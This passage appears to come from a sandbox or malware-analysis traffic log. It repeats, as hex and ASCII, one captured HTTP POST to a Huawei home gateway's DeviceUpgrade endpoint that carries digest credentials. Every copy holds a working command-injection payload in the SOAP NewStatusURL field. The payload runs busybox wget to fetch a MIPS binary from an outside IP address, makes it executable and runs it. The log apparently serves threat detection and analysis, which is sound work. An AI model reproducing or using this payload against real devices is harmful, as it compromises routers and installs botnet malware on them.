6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh 